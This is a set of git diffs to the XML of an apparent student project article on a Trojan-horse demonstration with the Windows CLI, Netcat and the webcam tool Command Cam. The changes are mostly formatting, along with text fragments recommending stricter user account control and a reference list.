+        <w:t xml:space="preserve">In conjunction with this, the above-mentioned command executes the following the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6897,7 +6903,7 @@
         </w:rPr>
         <w:t xml:space="preserve">[1] Vangie Beal. 2015. The Difference Between a Computer Virus, Worm and Trojan Horse. (December 2015). Retrieved March 1, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId18">
+      <w:hyperlink r:id="rId28">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6919,7 +6925,7 @@
         </w:rPr>
         <w:t xml:space="preserve">[2] Aravsons. 2018. Trojan horse (computing). (February 2018). Retrieved March 1, 2018 f </w:t>
       </w:r>
-      <w:hyperlink r:id="rId19">
+      <w:hyperlink r:id="rId29">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6947,7 +6953,7 @@
         </w:rPr>
         <w:t xml:space="preserve">[3] Alan Tay. 2012. </w:t>
       </w:r>
-      <w:hyperlink r:id="rId20">
+      <w:hyperlink r:id="rId30">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6964,7 +6970,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. (January 2012). Retrieved March 1, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId21">
+      <w:hyperlink r:id="rId31">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7023,7 +7029,7 @@
         </w:rPr>
         <w:t xml:space="preserve">[5] Babar Bashir Chohan. 2017. Transmission Control Protocol. (November 2017). Retrieved March 2, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId22" w:history="1">
+      <w:hyperlink r:id="rId32" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7054,7 +7060,7 @@
         </w:rPr>
         <w:t xml:space="preserve">[6] Esmond Pitt. 2017. User Datagram Protocol. (April 2017). Retrieved March 2, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId23" w:history="1">
+      <w:hyperlink r:id="rId33" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7085,7 +7091,7 @@
       <w:r>
         <w:t xml:space="preserve">[7] ForensicsWiki. 2015. Netcat. (March 2015). Retrieved March 1, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId24" w:history="1">
+      <w:hyperlink r:id="rId34" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7106,7 +7112,7 @@
       <w:r>
         <w:t xml:space="preserve">[8] Guy Harris. 2017. Command-line interface. (November 2017). Retrieved March 2, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId25" w:history="1">
+      <w:hyperlink r:id="rId35" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7914,6 +7920,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -8322,7 +8329,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B7D0B8AB-241E-4CEE-87E1-1C01F46403E5}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9CAD331B-6E27-4B23-9417-8B387ABD19B9}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/OSproject_r1/IT154_Project_Article.docx
+++ b/OSproject_r1/IT154_Project_Article.docx
@@ -1963,7 +1963,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId9">
+                                    <a:blip r:embed="rId8">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2111,7 +2111,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId10">
+                                          <a:blip r:embed="rId9">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2235,7 +2235,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId11">
+                                    <a:blip r:embed="rId9">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2589,7 +2589,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId12">
+                                          <a:blip r:embed="rId10">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2706,7 +2706,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId13">
+                                    <a:blip r:embed="rId10">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3056,7 +3056,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId14">
+                                          <a:blip r:embed="rId11">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3173,7 +3173,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId15">
+                                    <a:blip r:embed="rId11">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3559,7 +3559,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId16">
+                                          <a:blip r:embed="rId12">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3676,7 +3676,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId17">
+                                    <a:blip r:embed="rId12">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4026,7 +4026,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId18">
+                                          <a:blip r:embed="rId13">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4137,7 +4137,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId19">
+                                    <a:blip r:embed="rId13">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4300,7 +4300,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId20">
+                                          <a:blip r:embed="rId14">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4411,7 +4411,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId21">
+                                    <a:blip r:embed="rId14">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4936,7 +4936,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId22">
+                                          <a:blip r:embed="rId15">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5047,7 +5047,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId23">
+                                    <a:blip r:embed="rId15">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5363,7 +5363,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId24">
+                                          <a:blip r:embed="rId16">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5477,7 +5477,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId25">
+                                    <a:blip r:embed="rId16">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5654,7 +5654,7 @@
                                           </pic:cNvPicPr>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId26">
+                                          <a:blip r:embed="rId17">
                                             <a:extLst>
                                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5765,7 +5765,7 @@
                                     </pic:cNvPicPr>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId27">
+                                    <a:blip r:embed="rId17">
                                       <a:extLst>
                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6088,8 +6088,6 @@
         </w:rPr>
         <w:t>a local area network</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6718,35 +6716,36 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="20"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
         <w:t>I</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t>t is evident th</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">at, although most actions in the system within the frame of reference require administrative level authorization, there should be a stricter </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">implementation of the </w:t>
       </w:r>
@@ -6754,126 +6753,119 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t>user account control</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">system </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t>present in Microsoft Windows</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t>, such</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve"> as in some scenarios </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t>wherein</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve"> execution of a specific command should have been blocked</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t>, but</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve"> it was still process</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t>ed</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve"> and executed by the OS with no doubt in the executing authority.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
         <w:t xml:space="preserve">On the other hand, although it is good that </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
         </w:rPr>
         <w:t>original equipment manufacturer</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">s allow programmers to make use of methods found in their libraries, especially some methods used by the kernel to interpret input from external </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>devices, it is also evident that the act of allowing access to such methods could easily lead to attacks and misuse as exposing these methods allow the said programmer full control of them.</w:t>
-      </w:r>
+        </w:rPr>
+        <w:t>s allow programmers to make use of methods found in their libraries, especially some methods used by the kernel to interpret input from external devices, it is also evident that the act of allowing access to such methods could easily lead to attacks and misuse as exposing these methods allow the said programmer full control of them.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6890,7 +6882,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>____________________________________________________________________________________REFERENCES</w:t>
+        <w:t>REFERENCES</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6903,7 +6895,7 @@
         </w:rPr>
         <w:t xml:space="preserve">[1] Vangie Beal. 2015. The Difference Between a Computer Virus, Worm and Trojan Horse. (December 2015). Retrieved March 1, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId28">
+      <w:hyperlink r:id="rId18">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6925,7 +6917,7 @@
         </w:rPr>
         <w:t xml:space="preserve">[2] Aravsons. 2018. Trojan horse (computing). (February 2018). Retrieved March 1, 2018 f </w:t>
       </w:r>
-      <w:hyperlink r:id="rId29">
+      <w:hyperlink r:id="rId19">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6953,7 +6945,7 @@
         </w:rPr>
         <w:t xml:space="preserve">[3] Alan Tay. 2012. </w:t>
       </w:r>
-      <w:hyperlink r:id="rId30">
+      <w:hyperlink r:id="rId20">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6970,7 +6962,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. (January 2012). Retrieved March 1, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId31">
+      <w:hyperlink r:id="rId21">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7029,7 +7021,7 @@
         </w:rPr>
         <w:t xml:space="preserve">[5] Babar Bashir Chohan. 2017. Transmission Control Protocol. (November 2017). Retrieved March 2, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId32" w:history="1">
+      <w:hyperlink r:id="rId22" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7060,7 +7052,7 @@
         </w:rPr>
         <w:t xml:space="preserve">[6] Esmond Pitt. 2017. User Datagram Protocol. (April 2017). Retrieved March 2, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId33" w:history="1">
+      <w:hyperlink r:id="rId23" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7091,7 +7083,7 @@
       <w:r>
         <w:t xml:space="preserve">[7] ForensicsWiki. 2015. Netcat. (March 2015). Retrieved March 1, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId34" w:history="1">
+      <w:hyperlink r:id="rId24" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7112,7 +7104,7 @@
       <w:r>
         <w:t xml:space="preserve">[8] Guy Harris. 2017. Command-line interface. (November 2017). Retrieved March 2, 2018 from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId35" w:history="1">
+      <w:hyperlink r:id="rId25" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8329,7 +8321,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9CAD331B-6E27-4B23-9417-8B387ABD19B9}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{18698003-F4DC-45F6-AC2F-A71E48CBD761}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/OSproject_r1/IT154_Project_Article.docx
+++ b/OSproject_r1/IT154_Project_Article.docx
@@ -1095,7 +1095,35 @@
           <w:i/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Windows Command Line Interface (CLI) </w:t>
+        <w:t>Windows Command Line Interface (CLI)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, Command Cam </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>an open source program that allows photo capture through the host’s built-in camera</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1214,7 +1242,17 @@
           <w:i/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">best effort </w:t>
+        <w:t xml:space="preserve">best </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">effort </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1247,16 +1285,7 @@
           <w:bCs/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> for addressing </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>different functions at the source and destination of the said datagram.</w:t>
+        <w:t xml:space="preserve"> for addressing different functions at the source and destination of the said datagram.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6864,8 +6893,6 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8321,7 +8348,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{18698003-F4DC-45F6-AC2F-A71E48CBD761}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DDEBB527-0775-4093-B47D-6D640F5CCF0B}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/OSproject_r1/IT154_Project_Article.docx
+++ b/OSproject_r1/IT154_Project_Article.docx
@@ -1008,7 +1008,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>similar to</w:t>
+        <w:t>like</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1018,6 +1018,8 @@
         </w:rPr>
         <w:t xml:space="preserve"> what was demonstrated in this study to steal valuable information and cause harm.</w:t>
       </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1114,8 +1116,6 @@
         </w:rPr>
         <w:t>an open source program that allows photo capture through the host’s built-in camera</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1173,7 +1173,39 @@
           <w:bCs/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>While serving as a complement to Internet Protocol in general, TCP is known to provide reliable, ordered and error-checked delivery of stream of octets (or bytes) between applications running on hosts communicating by an I.P. network. Major internet applications such as the World Wide Web, e-mail, remote administration (like telnet) and file transfer reply on TCP.</w:t>
+        <w:t>While serving as a complement to Internet Protocol in general, TCP is known to provide reliable, ordered and error-checked delivery of stream of octets (or bytes) between applications running on hosts communicating by an I.P. network. Major internet applications such as the World Wide Web, e-mail, remote administration (like telnet) and file transfer reply on TCP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
